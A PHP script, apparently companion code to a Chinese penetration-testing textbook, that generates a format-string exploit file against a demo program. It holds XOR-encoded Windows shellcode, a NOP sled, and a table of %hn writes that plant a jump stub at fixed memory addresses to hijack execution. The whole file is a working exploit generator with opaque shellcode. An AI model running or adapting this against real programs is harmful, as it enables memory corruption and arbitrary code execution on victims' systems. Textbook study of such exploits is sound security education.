format.php

Companion source code for 《网络渗透技术》 (Network Penetration Techniques)
PHP
<?php
/* format.php
 *
 *  Demo program for 《网络渗透技术》 (Network Penetration Techniques)
 *  Authors: san, alert7, eyas, watercloud
 *  Builds the format-string file "binfile", targeting format.c
 */

// Number of "%.8x" specifiers needed to walk the stack up to the start of
// our buffer before the "%hn" writes begin (depends on format.c's layout).
$flag = 2;
// Shellcode appended after a 100-byte NOP sled (see the end of the file).
$shellcode =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x58\x01\x80\x34\x0b\xf8\xe2\xfa".
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\xda\xf9\xf8\xf8\xa7\x9c\x59\xc8".
"\xf8\xf8\xf8\xa8\x73\xb8\xf4\x73\xb8\xe4\x73\x90\xf0\xa8\x73\x0f".
"\x92\xfa\xa1\x10\x39\xf8\xf8\xf8\x1a\x01\xa0\x73\xf8\x73\x90\xf0".
"\xa0\x07\xce\x77\xb8\xd8\x07\x8e\xfc\x77\xb8\xdc\x92\xfb\xa1\x10".
"\x5d\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f\x8b\xca\xa7".
"\xac\x07\xae\xf0\x73\x10\x92\xfd\xa1\x10\x73\xf8\xf8\xf8\x1a\x01".
"\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae\xec\xa8".
"\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe0\x73\x20\xcb\x38\xa8\xa8".
"\xa8\x73\x04\x9e\x3f\xff\xfa\xf8\x9e\x73\xbe\xd0\x7e\x3c\x9e\x71".
"\xbf\xfa\x92\xe8\xaf\xab\x07\xae\xe4\x92\xf9\xab\x07\xae\xd8\xa8".
"\xa8\xab\x07\xae\xdc\x73\x20\x90\x9b\x95\x9c\xf8\x75\xec\xdc\x7b".
"\x14\xac\x73\x04\x92\xec\xa1\xcb\x38\x71\xfc\x77\x1a\x03\x3e\xbf".
"\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7".
"\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9\x92\xf9\xa9\xa9\xaa\xa9\x07".
"\xae\xf4\xcb\x38\xb0\xa8\x07\xae\xe8\xa9\xae\x73\x8d\xc4\x73\x8c".
"\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb\x0d\xcb\x31\xb1\xb9\x55\xfb".
"\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c\xf0\x39\x33\xff\xfb\x22\xb8".
"\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6\xdc\xfb\x25\x9e\x73\xf4\xb3".
"\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb\x3d\x53\xa6\xa1\x3b\x10\x21".
"\x06\x07\x07\x06\xdc\x81\x9c\x22\x06\xf1\x6e\xca\x8c\x69\xf4\x31".
"\x44\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c".
"\xe8\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9\xa4\xe9\x47\x1d";

/*
Stub placed at 0x7FFDF250 by the "%hn" writes below: it scans upward from
ESP for the 0x90909090 NOP sled and returns into it.

7FFDF250    54              PUSH ESP
7FFDF251    5F              POP EDI
7FFDF252    B8 90909090     MOV EAX,90909090
7FFDF257    FC              CLD
7FFDF258    F2:AF           REPNE SCAS DWORD PTR ES:[EDI]
7FFDF25A    57              PUSH EDI
7FFDF25B    C3              RETN
*/
// Target address => 16-bit value to write there with "%hn".
// The first six entries lay down the stub above at 0x7FFDF250; the last two
// write the stub's address (0x7FFD:F250) as two halves at 0x7FFDF020.
// Values are integer literals: PHP 7+ no longer treats strings such as
// "0x5f54" as numbers, so the original quoted form would subtract as 0.
$fmt_array = array(
                    0x7FFDF250 => 0x5f54,
                    0x7FFDF252 => 0x90b8,
                    0x7FFDF254 => 0x9090,
                    0x7FFDF256 => 0xfc90,
                    0x7FFDF258 => 0xaff2,
                    0x7FFDF25A => 0xc357,
                    0x7FFDF022 => 0x7ffd,
                    0x7FFDF020 => 0xf250,
                   );

// Sort by value so each successive "%Nc" pad count is non-negative
// (the running character count only ever grows).
asort($fmt_array);
print_r($fmt_array);
$count = count($fmt_array);

$head = "";      // "AAAA" filler + little-endian target address, one pair per write
$tail = "";      // "%Nc%hn" pairs that pad the count and then store it
$last = 0;       // characters printf will have emitted so far
foreach($fmt_array as $k => $v) {
    printf("%x\n", $k);
    // Split the target address into bytes, emitted least-significant first.
    $b0 = sprintf("%c", (($k >> 24) & 0xff));
    $b1 = sprintf("%c", (($k >> 16) & 0xff));
    $b2 = sprintf("%c", (($k >>  8) & 0xff));
    $b3 = sprintf("%c", (($k      ) & 0xff));

    // Before the first write, printf has already echoed the head
    // (8 bytes per entry) and the $flag "%.8x" outputs (8 chars each).
    if (!$last) {
        $last += 8*$count+8*$flag;
    }

    // "%Nc" consumes the "AAAA" filler and pads the count up to $v;
    // "%hn" then stores the low 16 bits of the count at the address.
    $head .= "AAAA".$b3.$b2.$b1.$b0;
    $tail .= "%".($v-$last)."c%hn";
    $last  = $v;
}
$fmt_str  = $head.(str_repeat("%.8x", $flag)).$tail;

// 100-byte NOP sled followed by the shellcode.
$fmt_str .= str_repeat("\x90", 100).$shellcode;

$fp = fopen("binfile", "wb");
fwrite($fp, $fmt_str);
fclose($fp);
?>
